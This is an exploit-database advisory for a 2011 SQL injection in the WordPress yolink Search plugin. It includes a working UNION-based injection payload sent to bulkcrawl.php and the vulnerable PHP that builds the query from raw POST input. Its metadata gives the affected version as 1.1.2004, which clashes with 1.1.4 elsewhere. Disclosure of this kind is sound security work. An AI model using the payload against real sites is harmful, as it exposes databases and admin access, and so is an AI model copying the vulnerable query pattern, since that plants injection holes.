WordPress yolink Search plugin

vendor:

yolink Search

by:

Miroslav Stampar

CVSS

HIGH

SQL Injection

CWE

Product Name: yolink Search

Affected Version From: 1.1.2004

Affected Version To: 1.1.2004

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:yolink_search

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability

The vulnerability exists due to misusage of $wpdb->prepare() in the bulkcrawl.php script, which can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be exploited to disclose the content of the database, to gain access to the administrative panel, etc.

Mitigation:

Upgrade to the latest version of the plugin.

Source

Exploit-DB raw data:

# Exploit Title: WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip
# Version: 1.1.4 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php
 page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1

---------------
Vulnerable code
---------------
$post_type_in = array();

if( isset( $_POST['page'] ) )
{
    $post_type_in[] = '"page"';
}
if( isset( $_POST['post'] ) )
{
    $post_type_in[] = '"post"';
}
$post_type_in = '(' . implode(',', $post_type_in) . ')';
$id_from = $_POST['from_id'];
$batch_size = $_POST['batch_size'];

$post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)